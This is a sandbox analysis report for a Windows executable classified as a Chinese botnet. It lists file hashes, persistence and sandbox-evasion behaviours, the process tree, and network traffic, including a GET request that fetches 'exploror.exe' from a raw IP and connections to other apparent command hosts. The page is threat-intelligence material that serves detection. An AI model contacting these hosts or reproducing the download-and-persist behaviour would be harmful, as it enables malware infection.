Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

8

Analysis

  • max time kernel
    41s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23/12/2022, 04:47 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

  • Size

    362KB

  • MD5

    99be0e637186d469b647525e9275ccfc

  • SHA1

    83a797037fd4c10f1248387395cc039aa9f3c71b

  • SHA256

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180

  • SHA512

    1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5

  • SSDEEP

    3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI

Score
10/10
chinese_generic_botnetbotnetpersistence

Malware Config

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

    botnetchinese_generic_botnet
  • Chinese Botnet payload 1 IoCs
    botnet
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
    "C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Windows directory
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c md C:\windowss64
      2⤵
        PID:1472

    Network

    • flag-unknown
      GET
      http://47.93.60.63:8000/exploror.exe
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      Remote address:
      47.93.60.63:8000
      Request
      GET /exploror.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 47.93.60.63:8000
      Connection: Keep-Alive
      Response
      HTTP/1.1 503 �����޷���ȡ
      Content-Type: text/html
      Accept-Ranges: bytes
      Server: HFS 2.3i
      Set-Cookie: HFS_SID_=0.931278704432771; path=/; HttpOnly
      Content-Encoding: gzip
    • 47.93.60.63:8000
      http://47.93.60.63:8000/exploror.exe
      http
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      695 B
       1.6kB
       8
      5

      HTTP Request

      GET http://47.93.60.63:8000/exploror.exe

      HTTP Response

      503
    • 106.52.15.123:80
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      152 B
       80 B
       3
      2
    • 106.52.15.123:80
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      152 B
       40 B
       3
      1
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      1.6kB
       841 B
       21
      20
    No results found

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1996-54-0x0000000074C11000-0x0000000074C13000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1996-56-0x0000000010000000-0x0000000010018000-memory.dmp

      Filesize

      96KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.